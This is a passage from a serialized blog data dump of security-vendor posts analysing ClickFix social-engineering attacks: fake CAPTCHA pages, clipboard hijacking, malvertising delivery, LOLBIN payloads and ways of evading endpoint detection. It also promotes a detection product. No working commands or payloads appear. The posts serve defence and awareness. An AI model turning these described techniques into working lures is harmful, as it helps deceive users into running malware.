surface.",{"data":23226,"content":23227,"nodeType":860},{},[23228,23231,23238,23241,23248],{"data":23229,"marks":23230,"value":16314,"nodeType":864},{},[],{"data":23232,"content":23233,"nodeType":883},{"uri":10269},[23234],{"data":23235,"marks":23236,"value":10275,"nodeType":864},{},[23237],{"type":1455},{"data":23239,"marks":23240,"value":19754,"nodeType":864},{},[],{"data":23242,"content":23243,"nodeType":883},{"uri":1700},[23244],{"data":23245,"marks":23246,"value":10299,"nodeType":864},{},[23247],{"type":1455},{"data":23249,"marks":23250,"value":2924,"nodeType":864},{},[],{"data":23252,"content":23256,"nodeType":996},{"target":23253},{"sys":23254},{"id":23255,"type":1001,"linkType":1002},"4D7zpYAc1tTEAmn2hpkWPe",[],{"data":23258,"content":23259,"nodeType":860},{},[23260],{"data":23261,"marks":23262,"value":21,"nodeType":864},{},[],"ConsentFix debrief: latest community insights, recommendations, and predictions","New insights on the ConsentFix campaign stopped by Push.","2026-01-14T00:00:00.000Z","consentfix-debrief",{"items":23268},[23269,23271],{"sys":23270,"name":342},{"id":6596},{"sys":23272,"name":6593},{"id":6592},{"items":23274},[23275],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":23276},{"url":2740},{"__typename":2059,"sys":23278,"content":23280,"title":23856,"synopsis":23857,"hashTags":59,"publishedDate":23858,"slug":23859,"tagsCollection":23860,"authorsCollection":23866},{"id":23279},"7rVNBW6rYXnXMpI0JEwzgR",{"json":23281},{"data":23282,"content":23283,"nodeType":856},{},[23284,23291,23298,23310,23316,23323,23326,23334,23341,23347,23363,23370,23393,23400,23406,23409,23417,23450,23456,23475,23481,23500,23507,23513,23516,23524,23531,23551,23558,23578,23585,23591,23594,23602,23609,23642,23649,23656,23702,23720,23730,23737,23740,23748,23768,23775,23782,23788,23791,23799,23819,23845,23850],{"data":23285,"content":23286,"nodeType":860},{},[23287],{"data":23288,"marks":23289,"value":23290,"nodeType":864},{},[],"ClickFix attacks have skyrocketed in the last year. This social engineering attack has established itself as a key part of the modern attacker’s toolkit, tricking victims into running malicious code on their device.",{"data":23292,"content":23293,"nodeType":860},{},[23294],{"data":23295,"marks":23296,"value":23297,"nodeType":864},{},[],"As we showcased in our last webinar and at our threat briefing in London earlier this month, ClickFix is evolving fast, in terms of the web pages themselves, the delivery mechanisms by which they are sent to victims, and the nature of the payload and its execution.",{"data":23299,"content":23300,"nodeType":860},{},[23301,23305],{"data":23302,"marks":23303,"value":23304,"nodeType":864},{},[],"One particular example stood out to us in our research. ",{"data":23306,"marks":23307,"value":23309,"nodeType":864},{},[23308],{"type":899},"So, is this the most advanced ClickFix you’ve seen?",{"data":23311,"content":23315,"nodeType":996},{"target":23312},{"sys":23313},{"id":23314,"type":1001,"linkType":1002},"ID7VKJNOZk729P5zBOBjZ",[],{"data":23317,"content":23318,"nodeType":860},{},[23319],{"data":23320,"marks":23321,"value":23322,"nodeType":864},{},[],"Let’s break it down further.",{"data":23324,"content":23325,"nodeType":1005},{},[],{"data":23327,"content":23328,"nodeType":1009},{},[23329],{"data":23330,"marks":23331,"value":23333,"nodeType":864},{},[23332],{"type":899},"How ClickFix pages are evolving",{"data":23335,"content":23336,"nodeType":860},{},[23337],{"data":23338,"marks":23339,"value":23340,"nodeType":864},{},[],"The CloudFlare-based lure is a great example of how ClickFix pages themselves are evolving — and becoming increasingly convincing to users. ",{"data":23342,"content":23346,"nodeType":996},{"target":23343},{"sys":23344},{"id":23345,"type":1001,"linkType":1002},"4wJOgtofImjbsekyXMc5Ec",[],{"data":23348,"content":23349,"nodeType":860},{},[23350,23354,23359],{"data":23351,"marks":23352,"value":23353,"nodeType":864},{},[],"This is an incredibly slick example — ",{"data":23355,"marks":23356,"value":23358,"nodeType":864},{},[23357],{"type":899},"it almost looks like Cloudflare shipped a new kind of bot check service. ",{"data":23360,"marks":23361,"value":23362,"nodeType":864},{},[],"The embedded video, countdown timer, and counter for “users verified in the last hour” all serve to increase the sense of authenticity, and put extra pressure on the victim to complete the check. ",{"data":23364,"content":23365,"nodeType":860},{},[23366],{"data":23367,"marks":23368,"value":23369,"nodeType":864},{},[],"There are a couple of extra things happening under the hood here, too:",{"data":23371,"content":23372,"nodeType":941},{},[23373,23383],{"data":23374,"content":23375,"nodeType":945},{},[23376],{"data":23377,"content":23378,"nodeType":860},{},[23379],{"data":23380,"marks":23381,"value":23382,"nodeType":864},{},[],"The page is adapting to the device that you’re visiting from, serving up instructions specific to the user’s Mac (increasingly common as ClickFix expands to support different Operating Systems).",{"data":23384,"content":23385,"nodeType":945},{},[23386],{"data":23387,"content":23388,"nodeType":860},{},[23389],{"data":23390,"marks":23391,"value":23392,"nodeType":864},{},[],"The page is automatically copying the malicious code to the user’s clipboard via JavaScript (which we see in 9/10 cases).",{"data":23394,"content":23395,"nodeType":860},{},[23396],{"data":23397,"marks":23398,"value":23399,"nodeType":864},{},[],"For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. It hasn’t focused on opening up a program and running a command — so it’s no surprise that this kind of highly convincing page is so effective at duping victims into following the instructions. ",{"data":23401,"content":23405,"nodeType":996},{"target":23402},{"sys":23403},{"id":23404,"type":1001,"linkType":1002},"LiVIyGxdAaUXUfvKjD6ON",[],{"data":23407,"content":23408,"nodeType":1005},{},[],{"data":23410,"content":23411,"nodeType":1009},{},[23412],{"data":23413,"marks":23414,"value":23416,"nodeType":864},{},[23415],{"type":899},"How ClickFix delivery methods are evolving",{"data":23418,"content":23419,"nodeType":860},{},[23420,23424,23433,23437,23446],{"data":23421,"marks":23422,"value":23423,"nodeType":864},{},[],"There’s also the fact that this page wasn’t accessed via email. The top delivery vector for ClickFix attacks that we’ve observed is, in fact, Google Search — in the form of ",{"data":23425,"content":23427,"nodeType":883},{"uri":23426},"https://phishing-techniques.pushsecurity.com/techniques/malvertising/",[23428],{"data":23429,"marks":23430,"value":23432,"nodeType":864},{},[23431],{"type":1455},"poisoned search results and malicious advertising (malvertising)",{"data":23434,"marks":23435,"value":23436,"nodeType":864},{},[],". Attackers are either taking over legitimate sites (there’s a ",{"data":23438,"content":23440,"nodeType":883},{"uri":23439},"https://www.bleepingcomputer.com/news/security/hackers-launch-mass-attacks-exploiting-outdated-wordpress-plugins/",[23441],{"data":23442,"marks":23443,"value":23445,"nodeType":864},{},[23444],{"type":1455},"steady supply of website hosting and CMS vulnerabilities",{"data":23447,"marks":23448,"value":23449,"nodeType":864},{},[]," to take advantage of) or simply vibe-coding their own sites and optimizing them for various search terms. ",{"data":23451,"content":23455,"nodeType":996},{"target":23452},{"sys":23453},{"id":23454,"type":1001,"linkType":1002},"6N9EmH6AaN6Hr4xk6ozATR",[],{"data":23457,"content":23458,"nodeType":860},{},[23459,23463,23472],{"data":23460,"marks":23461,"value":23462,"nodeType":864},{},[],"And because most anti-phishing controls are implemented via email, by using ",{"data":23464,"content":23466,"nodeType":883},{"uri":23465},"https://pushsecurity.com/blog/why-attackers-are-moving-beyond-email-based-phishing?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[23467],{"data":23468,"marks":23469,"value":23471,"nodeType":864},{},[23470],{"type":1455},"non-email delivery vectors, an entire layer of detection opportunity is cut out",{"data":23473,"marks":23474,"value":10094,"nodeType":864},{},[],{"data":23476,"content":23480,"nodeType":996},{"target":23477},{"sys":23478},{"id":23479,"type":1001,"linkType":1002},"1CWsZlLFX9TS53J1uamOG8",[],{"data":23482,"content":23483,"nodeType":860},{},[23484,23488,23496],{"data":23485,"marks":23486,"value":23487,"nodeType":864},{},[],"But even when they are sent via email, ClickFix pages, like other modern phishing sites, are using a range of ",{"data":23489,"content":23491,"nodeType":883},{"uri":23490},"https://pushsecurity.com/blog/phishing-detection-evasion-launch?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[23492],{"data":23493,"marks":23494,"value":13810,"nodeType":864},{},[23495],{"type":1455},{"data":23497,"marks":23498,"value":23499,"nodeType":864},{},[]," that prevent them being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e. blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures firing. ",{"data":23501,"content":23502,"nodeType":860},{},[23503],{"data":23504,"marks":23505,"value":23506,"nodeType":864},{},[],"Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.",{"data":23508,"content":23512,"nodeType":996},{"target":23509},{"sys":23510},{"id":23511,"type":1001,"linkType":1002},"3HiqpIBWWMr5FMi3IBzXcc",[],{"data":23514,"content":23515,"nodeType":1005},{},[],{"data":23517,"content":23518,"nodeType":1009},{},[23519],{"data":23520,"marks":23521,"value":23523,"nodeType":864},{},[23522],{"type":899},"How ClickFix payloads are evolving",{"data":23525,"content":23526,"nodeType":860},{},[23527],{"data":23528,"marks":23529,"value":23530,"nodeType":864},{},[],"It’s not just the ClickFix page and delivery mechanisms that are evolving — the services where code is being run, and the type of payload, are also increasingly varied. ",{"data":23532,"content":23533,"nodeType":860},{},[23534,23538,23547],{"data":23535,"marks":23536,"value":23537,"nodeType":864},{},[],"While the main payloads observed by Push are mshta and PowerShell, ",{"data":23539,"content":23541,"nodeType":883},{"uri":23540},"https://mhaggis.github.io/ClickGrab/techniques.html",[23542],{"data":23543,"marks":23544,"value":23546,"nodeType":864},{},[23545],{"type":1455},"attackers are abusing a wide range of LOLBINS",{"data":23548,"marks":23549,"value":23550,"nodeType":864},{},[]," targeting different services across Operating Systems.",{"data":23552,"content":23553,"nodeType":860},{},[23554],{"data":23555,"marks":23556,"value":23557,"nodeType":864},{},[],"While it is possible to disable the Win+R dialog box and limit the applications that can be run from the File Explorer address bar, it is not possible to similarly restrict users from interacting with other legitimate services to run malicious commands. ",{"data":23559,"content":23560,"nodeType":860},{},[23561,23565,23574],{"data":23562,"marks":23563,"value":23564,"nodeType":864},{},[],"Another recent example termed ",{"data":23566,"content":23568,"nodeType":883},{"uri":23567},"https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/",[23569],{"data":23570,"marks":23571,"value":23573,"nodeType":864},{},[23572],{"type":1455},"cache smuggling",{"data":23575,"marks":23576,"value":23577,"nodeType":864},{},[]," was also identified by security researchers. This technique combines a ClickFix approach with JavaScript that caches a malicious file posing as a JPG. This means that the ClickFix command executes locally — effectively getting an entire zip file onto the local system without the PowerShell command needing to make any web requests.",{"data":23579,"content":23580,"nodeType":860},{},[23581],{"data":23582,"marks":23583,"value":23584,"nodeType":864},{},[],"Finally, it’s worth considering the future of ClickFix. The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? ",{"data":23586,"content":23590,"nodeType":996},{"target":23587},{"sys":23588},{"id":23589,"type":1001,"linkType":1002},"2rUDKawJnrmZVtxfNcSNha",[],{"data":23592,"content":23593,"nodeType":1005},{},[],{"data":23595,"content":23596,"nodeType":1009},{},[23597],{"data":23598,"marks":23599,"value":23601,"nodeType":864},{},[23600],{"type":899},"What’s the impact of ClickFix evolution?",{"data":23603,"content":23604,"nodeType":860},{},[23605],{"data":23606,"marks":23607,"value":23608,"nodeType":864},{},[],"To summarize:",{"data":23610,"content":23611,"nodeType":941},{},[23612,23622,23632],{"data":23613,"content":23614,"nodeType":945},{},[23615],{"data":23616,"content":23617,"nodeType":860},{},[23618],{"data":23619,"marks":23620,"value":23621,"nodeType":864},{},[],"ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering.",{"data":23623,"content":23624,"nodeType":945},{},[23625],{"data":23626,"content":23627,"nodeType":860},{},[23628],{"data":23629,"marks":23630,"value":23631,"nodeType":864},{},[],"ClickFix delivery is evading traditional monitoring controls at the email layer to reach victims. ",{"data":23633,"content":23634,"nodeType":945},{},[23635],{"data":23636,"content":23637,"nodeType":860},{},[23638],{"data":23639,"marks":23640,"value":23641,"nodeType":864},{},[],"ClickFix payloads are becoming more varied and are finding new ways to evade security controls. ",{"data":23643,"content":23644,"nodeType":860},{},[23645],{"data":23646,"marks":23647,"value":23648,"nodeType":864},{},[],"This means that EDR-based interception of malware execution is the last — and only — real line of defense for most organizations, kicking in after the initial script has been run (typically acting as a stager for the real malware). ",{"data":23650,"content":23651,"nodeType":860},{},[23652],{"data":23653,"marks":23654,"value":23655,"nodeType":864},{},[],"Malware execution can and should be intercepted by EDR, but it’s not foolproof. ",{"data":23657,"content":23658,"nodeType":941},{},[23659,23682,23692],{"data":23660,"content":23661,"nodeType":945},{},[23662],{"data":23663,"content":23664,"nodeType":860},{},[23665,23669,23678],{"data":23666,"marks":23667,"value":23668,"nodeType":864},{},[],"Attackers are constantly ",{"data":23670,"content":23672,"nodeType":883},{"uri":23671},"https://www.infostealers.com/article/logins-zip-leverages-chromium-zero-day-stealthy-infostealer-builder-promises-99-credential-theft-in-under-12-seconds/",[23673],{"data":23674,"marks":23675,"value":23677,"nodeType":864},{},[23676],{"type":1455},"developing new tools and capabilities",{"data":23679,"marks":23680,"value":23681,"nodeType":864},{},[]," to bypass EDR in the cat-and-mouse game between attackers and defenders.",{"data":23683,"content":23684,"nodeType":945},{},[23685],{"data":23686,"content":23687,"nodeType":860},{},[23688],{"data":23689,"marks":23690,"value":23691,"nodeType":864},{},[],"Because ClickFix attacks are user initiated, context might be missing that lead to the alert being misclassified. This can mean the difference between the level of priority alert that is raised, and whether or not it is automatically blocked.",{"data":23693,"content":23694,"nodeType":945},{},[23695],{"data":23696,"content":23697,"nodeType":860},{},[23698],{"data":23699,"marks":23700,"value":23701,"nodeType":864},{},[],"If you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.",{"data":23703,"content":23704,"nodeType":860},{},[23705,23709,23716],{"data":23706,"marks":23707,"value":23708,"nodeType":864},{},[],"This is why attackers are doubling down. According to the ",{"data":23710,"content":23711,"nodeType":883},{"uri":19546},[23712],{"data":23713,"marks":23714,"value":23715,"nodeType":864},{},[],"2025 Microsoft Digital Defense report",{"data":23717,"marks":23718,"value":23719,"nodeType":864},{},[],", ClickFix was the most common initial access method in the last year, accounting for 47% of attacks. That's a pretty significant stat.",{"data":23721,"content":23722,"nodeType":1116},{},[23723],{"data":23724,"content":23725,"nodeType":860},{},[23726],{"data":23727,"marks":23728,"value":23729,"nodeType":864},{},[],"47% of attacks started with ClickFix in the last year, according to Microsoft.",{"data":23731,"content":23732,"nodeType":860},{},[23733],{"data":23734,"marks":23735,"value":23736,"nodeType":864},{},[],"Ultimately, organizations are leaving themselves relying on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all. ",{"data":23738,"content":23739,"nodeType":1005},{},[],{"data":23741,"content":23742,"nodeType":1009},{},[23743],{"data":23744,"marks":23745,"value":23747,"nodeType":864},{},[23746],{"type":899},"Don’t gamble on a single point of failure ",{"data":23749,"content":23750,"nodeType":860},{},[23751,23755,23764],{"data":23752,"marks":23753,"value":23754,"nodeType":864},{},[],"Push Security’s latest feature, ",{"data":23756,"content":23758,"nodeType":883},{"uri":23757},"https://pushsecurity.com/blog/introducing-malicious-copy-paste-detection?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[23759],{"data":23760,"marks":23761,"value":23763,"nodeType":864},{},[23762],{"type":1455},"malicious copy and paste detection",{"data":23765,"marks":23766,"value":23767,"nodeType":864},{},[],", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",{"data":23769,"content":23770,"nodeType":860},{},[23771],{"data":23772,"marks":23773,"value":23774,"nodeType":864},{},[],"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.",{"data":23776,"content":23777,"nodeType":860},{},[23778],{"data":23779,"marks":23780,"value":23781,"nodeType":864},{},[],"By adding a new layer of protection in the browser, security teams can reduce the strain on their EDR and reduce the risk of host-based controls being bypassed through misconfiguration or attacker innovation. ",{"data":23783,"content":23787,"nodeType":996},{"target":23784},{"sys":23785},{"id":23786,"type":1001,"linkType":1002},"sALkMt8UbTZ2f34hKvGLj",[],{"data":23789,"content":23790,"nodeType":1005},{},[],{"data":23792,"content":23793,"nodeType":1009},{},[23794],{"data":23795,"marks":23796,"value":23798,"nodeType":864},{},[23797],{"type":899},"Learn more",{"data":23800,"content":23801,"nodeType":860},{},[23802,23806,23815],{"data":23803,"marks":23804,"value":23805,"nodeType":864},{},[],"If you want to learn more about ClickFix attacks and how they’re evolving, ",{"data":23807,"content":23809,"nodeType":883},{"uri":23808},"https://pushsecurity.com/resources/clickfix",[23810],{"data":23811,"marks":23812,"value":23814,"nodeType":864},{},[23813],{"type":1455},"check out our latest webinar (now available on-demand!)",{"data":23816,"marks":23817,"value":23818,"nodeType":864},{},[]," where we dive into real-world ClickFix examples and demonstrate how ClickFix sites work under the hood. ",{"data":23820,"content":23821,"nodeType":860},{},[23822,23825,23832,23835,23842],{"data":23823,"marks":23824,"value":16314,"nodeType":864},{},[],{"data":23826,"content":23827,"nodeType":883},{"uri":10269},[23828],{"data":23829,"marks":23830,"value":10275,"nodeType":864},{},[23831],{"type":1455},{"data":23833,"marks":23834,"value":19754,"nodeType":864},{},[],{"data":23836,"content":23837,"nodeType":883},{"uri":1700},[23838],{"data":23839,"marks":23840,"value":10299,"nodeType":864},{},[23841],{"type":1455},{"data":23843,"marks":23844,"value":2924,"nodeType":864},{},[],{"data":23846,"content":23849,"nodeType":996},{"target":23847},{"sys":23848},{"id":23404,"type":1001,"linkType":1002},[],{"data":23851,"content":23852,"nodeType":860},{},[23853],{"data":23854,"marks":23855,"value":21,"nodeType":864},{},[],"The most advanced ClickFix yet?","Breaking down the most sophisticated ClickFix page we’ve seen in the wild — and what it tells us about the future of malicious copy-and-paste attacks. ","2025-11-06T00:00:00.000Z","the-most-advanced-clickfix-yet",{"items":23861},[23862,23864],{"sys":23863,"name":342},{"id":6596},{"sys":23865,"name":6593},{"id":6592},{"items":23867},[23868],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":23869},{"url":2740},{"__typename":2059,"sys":23871,"content":23873,"title":24493,"synopsis":24494,"hashTags":59,"publishedDate":24495,"slug":24496,"tagsCollection":24497,"authorsCollection":24503},{"id":23872},"1u8RJxC00HbBhCBVxcDnkK",{"json":23874},{"data":23875,"content":23876,"nodeType":856},{},[23877,23922,23979,23994,23999,24006,24009,24017,24024,24031,24038,24058,24065,24071,24089,24095,24098,24106,24113,24121,24141,24148,24155,24162,24170,24177,24184,24190,24197,24230,24236,24244,24263,24270,24293,24300,24307,24313,24320,24323,24331,24345,24365,24372,24379,24386,24391,24399,24418,24421,24428,24435,24442,24449,24456,24482,24487],{"data":23878,"content":23879,"nodeType":860},{},[23880,23884,23892,23896,23905,23909,23918],{"data":23881,"marks":23882,"value":23883,"nodeType":864},{},[],"One of the biggest security trends in the past year has been the emergence of the attack technique known as ",{"data":23885,"content":23887,"nodeType":883},{"uri":23886},"https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/",[23888],{"data":23889,"marks":23890,"value":315,"nodeType":864},{},[23891],{"type":1455},{"data":23893,"marks":23894,"value":23895,"nodeType":864},{},[],". Various reports indicate that ClickFix is fast becoming one of the most prevalent attack techniques this year, with ",{"data":23897,"content":23899,"nodeType":883},{"uri":23898},"https://www.scworld.com/news/clickfix-phishing-links-increased-nearly-400-in-12-months-report-says",[23900],{"data":23901,"marks":23902,"value":23904,"nodeType":864},{},[23903],{"type":1455},"one study",{"data":23906,"marks":23907,"value":23908,"nodeType":864},{},[]," reporting that email-based ClickFix attacks have increased by 400% YOY, and ",{"data":23910,"content":23912,"nodeType":883},{"uri":23911},"https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12025.pdf",[23913],{"data":23914,"marks":23915,"value":23917,"nodeType":864},{},[23916],{"type":1455},"another",{"data":23919,"marks":23920,"value":23921,"nodeType":864},{},[]," highlighting a 517% increase in the past 6 months. ",{"data":23923,"content":23924,"nodeType":860},{},[23925,23929,23938,23941,23950,23953,23962,23966,23975],{"data":23926,"marks":23927,"value":23928,"nodeType":864},{},[],"ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors. A number of recent public data breaches have been linked to ClickFix attacks as the attack vector, such as ",{"data":23930,"content":23932,"nodeType":883},{"uri":23931},"https://www.bleepingcomputer.com/news/security/kettering-health-confirms-interlock-ransomware-behind-cyberattack/",[23933],{"data":23934,"marks":23935,"value":23937,"nodeType":864},{},[23936],{"type":1455},"Kettering Health",{"data":23939,"marks":23940,"value":3731,"nodeType":864},{},[],{"data":23942,"content":23944,"nodeType":883},{"uri":23943},"https://www.bleepingcomputer.com/news/security/interlock-ransomware-claims-davita-attack-leaks-stolen-data/",[23945],{"data":23946,"marks":23947,"value":23949,"nodeType":864},{},[23948],{"type":1455},"DaVita",{"data":23951,"marks":23952,"value":3731,"nodeType":864},{},[],{"data":23954,"content":23956,"nodeType":883},{"uri":23955},"https://www.infosecurity-magazine.com/news/st-paul-mayor-interlock-data-leak/",[23957],{"data":23958,"marks":23959,"value":23961,"nodeType":864},{},[23960],{"type":1455},"City of St. Paul, Minnesota",{"data":23963,"marks":23964,"value":23965,"nodeType":864},{},[],", and the ",{"data":23967,"content":23969,"nodeType":883},{"uri":23968},"https://www.blackfog.com/texas-tech-cyberattack-1-4m-records-compromised/",[23970],{"data":23971,"marks":23972,"value":23974,"nodeType":864},{},[23973],{"type":1455},"Texas Tech University Health Sciences Centers",{"data":23976,"marks":23977,"value":23978,"nodeType":864},{},[]," (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).",{"data":23980,"content":23981,"nodeType":860},{},[23982,23986,23990],{"data":23983,"marks":23984,"value":23985,"nodeType":864},{},[],"Push’s latest feature, ",{"data":23987,"marks":23988,"value":23763,"nodeType":864},{},[23989],{"type":899},{"data":23991,"marks":23992,"value":23993,"nodeType":864},{},[],", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection, with a universally effective control that works regardless of the lure delivery channel, or page style and structure. ",{"data":23995,"content":23998,"nodeType":996},{"target":23996},{"sys":23997},{"id":23786,"type":1001,"linkType":1002},[],{"data":24000,"content":24001,"nodeType":860},{},[24002],{"data":24003,"marks":24004,"value":24005,"nodeType":864},{},[],"Before we get into the specifics of the feature, let’s take a look at what ClickFix is and why it poses a detection and response challenge to security teams.",{"data":24007,"content":24008,"nodeType":1005},{},[],{"data":24010,"content":24011,"nodeType":1009},{},[24012],{"data":24013,"marks":24014,"value":24016,"nodeType":864},{},[24015],{"type":899},"ClickFix 101",{"data":24018,"content":24019,"nodeType":860},{},[24020],{"data":24021,"marks":24022,"value":24023,"nodeType":864},{},[],"ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage. The name is a little misleading though — the key factor in the attack is that they trick users into running malicious commands on their device by copying malicious code from the page clipboard and running it locally. (For simplicity we’ll keep calling it ClickFix, but we’re not happy about it.)",{"data":24025,"content":24026,"nodeType":860},{},[24027],{"data":24028,"marks":24029,"value":24030,"nodeType":864},{},[],"The copy action is either performed manually by the user, or automatically by the page. Manual copies typically include additional social engineering to lure the victim into hitting CTRL+C, while automatic copies are performed using JavaScript running on the page. Most ClickFix pages we've seen are automatic copies, which makes sense — fewer steps means the user is more likely to follow the instruction.",{"data":24032,"content":24033,"nodeType":860},{},[24034],{"data":24035,"marks":24036,"value":24037,"nodeType":864},{},[],"Most commonly, these attacks are used to deliver remote access software or infostealer malware using stolen session cookies and credentials to facilitate attacks on business apps and services. From there, the attacker simply dumps the data and holds the victim to ransom for its deletion — often dropping ransomware afterwards for double the extortion. ",{"data":24039,"content":24040,"nodeType":860},{},[24041,24045,24054],{"data":24042,"marks":24043,"value":24044,"nodeType":864},{},[],"The attack gives the victim instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Terminal, or PowerShell in order to “fix” the fake problem that they’re experiencing. Variants such as ",{"data":24046,"content":24048,"nodeType":883},{"uri":24047},"https://mrd0x.com/filefix-clickfix-alternative/",[24049],{"data":24050,"marks":24051,"value":24053,"nodeType":864},{},[24052],{"type":1455},"FileFix",{"data":24055,"marks":24056,"value":24057,"nodeType":864},{},[]," have also emerged which instead use the File Explorer Address Bar to execute OS commands.",{"data":24059,"content":24060,"nodeType":860},{},[24061],{"data":24062,"marks":24063,"value":24064,"nodeType":864},{},[],"Links to malicious ClickFix pages are distributed over various delivery channels, with attacks shifting from traditional email-based delivery to social media, instant messaging apps, malicious ads in places like Google Search, and using in-app notifications and messages across numerous SaaS services. ",{"data":24066,"content":24070,"nodeType":996},{"target":24067},{"sys":24068},{"id":24069,"type":1001,"linkType":1002},"1I9ERDY2tuspw5zVMV5DbY",[],{"data":24072,"content":24073,"nodeType":860},{},[24074,24078,24085],{"data":24075,"marks":24076,"value":24077,"nodeType":864},{},[],"ClickFix comes in a variety of lures, including impersonating CAPTCHA, Cloudflare Turnstile, simulating an error loading a webpage, and many more. They have also been observed targeting a ",{"data":24079,"content":24080,"nodeType":883},{"uri":23540},[24081],{"data":24082,"marks":24083,"value":24084,"nodeType":864},{},[],"wide range of services",{"data":24086,"marks":24087,"value":24088,"nodeType":864},{},[]," to execute code. ",{"data":24090,"content":24094,"nodeType":996},{"target":24091},{"sys":24092},{"id":24093,"type":1001,"linkType":1002},"1SG52ta1hcBZ3gYDsSJvsm",[],{"data":24096,"content":24097,"nodeType":1005},{},[],{"data":24099,"content":24100,"nodeType":1009},{},[24101],{"data":24102,"marks":24103,"value":24105,"nodeType":864},{},[24104],{"type":899},"Why are ClickFix attacks so effective?",{"data":24107,"content":24108,"nodeType":860},{},[24109],{"data":24110,"marks":24111,"value":24112,"nodeType":864},{},[],"To understand the effectiveness of ClickFix-style attacks, we need to look more closely at the mechanisms that security teams have at their disposal to counter these attacks. ",{"data":24114,"content":24115,"nodeType":1312},{},[24116],{"data":24117,"marks":24118,"value":24120,"nodeType":864},{},[24119],{"type":899},"Detection challenges during delivery",{"data":24122,"content":24123,"nodeType":860},{},[24124,24128,24137],{"data":24125,"marks":24126,"value":24127,"nodeType":864},{},[],"We’ve written extensively about ",{"data":24129,"content":24131,"nodeType":883},{"uri":24130},"https://pushsecurity.com/blog/phishing-detection-evasion-launch/",[24132],{"data":24133,"marks":24134,"value":24136,"nodeType":864},{},[24135],{"type":1455},"the evolution in phishing techniques and tooling",{"data":24138,"marks":24139,"value":24140,"nodeType":864},{},[],", and what this means for the reliability of traditional detections at the network and endpoint layer. ",{"data":24142,"content":24143,"nodeType":860},{},[24144],{"data":24145,"marks":24146,"value":24147,"nodeType":864},{},[],"The latest generation of phishing pages are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",{"data":24149,"content":24150,"nodeType":860},{},[24151],{"data":24152,"marks":24153,"value":24154,"nodeType":864},{},[],"This means that traditional anti-phishing tools at the email and network layer are struggling to keep up, with many attacks evading email-based detections (or bypassing email altogether). At the same time, proxy-based solutions now see a garbled mess of JavaScript code without the necessary context of what is actually happening in the browser to be able to piece it together effectively. Even if they don’t realize it, this means many organizations are now relying solely on blocking known-bad sites and hosts — a wildly ineffective solution in 2025 with the rate that attackers refresh and rotate their phishing infrastructure. ",{"data":24156,"content":24157,"nodeType":860},{},[24158],{"data":24159,"marks":24160,"value":24161,"nodeType":864},{},[],"In addition to the fact that ClickFix page styles and content can vary significantly, this means that detecting ClickFix delivery using traditional tooling is highly unreliable. ",{"data":24163,"content":24164,"nodeType":1312},{},[24165],{"data":24166,"marks":24167,"value":24169,"nodeType":864},{},[24168],{"type":899},"Detection challenges during execution",{"data":24171,"content":24172,"nodeType":860},{},[24173],{"data":24174,"marks":24175,"value":24176,"nodeType":864},{},[],"Most of the detection heavy lifting is being done at the endpoint, looking for user-level code execution and malware running on a device. ",{"data":24178,"content":24179,"nodeType":860},{},[24180],{"data":24181,"marks":24182,"value":24183,"nodeType":864},{},[],"However, the number of ClickFix-related headlines in the news would indicate that endpoint controls are being routinely bypassed, or perhaps evaded altogether by targeting personal or BYOD devices. ",{"data":24185,"content":24189,"nodeType":996},{"target":24186},{"sys":24187},{"id":24188,"type":1001,"linkType":1002},"pocty4OhER5EXr8BDwdzo",[],{"data":24191,"content":24192,"nodeType":860},{},[24193],{"data":24194,"marks":24195,"value":24196,"nodeType":864},{},[],"There are a number of reasons that endpoint-level ClickFix detections can be bypassed:",{"data":24198,"content":24199,"nodeType":941},{},[24200,24210,24220],{"data":24201,"content":24202,"nodeType":945},{},[24203],{"data":24204,"content":24205,"nodeType":860},{},[24206],{"data":24207,"marks":24208,"value":24209,"nodeType":864},{},[],"The step of downloading a file from the web is bypassed altogether. In a ClickFix/FileFix attack, the initial “dropper” is essentially a command string provided by the attacker and executed by legitimate system utilities. There is often no new executable file written to disk when the user runs the command. The final payload may be loaded directly into memory or injected into trusted programs (using living-off-the-land techniques). Without a file to quarantine, there's no \"Mark of the Web\" to make it appear suspicious. ",{"data":24211,"content":24212,"nodeType":945},{},[24213],{"data":24214,"content":24215,"nodeType":860},{},[24216],{"data":24217,"marks":24218,"value":24219,"nodeType":864},{},[],"From the EDR’s point of view, a trusted parent process is launching a script – which might not immediately be judged as malicious, especially if the command is obfuscated or uses allowed system functions. Since the action is initiated by the user, it blends in with normal user-driven administration tasks. 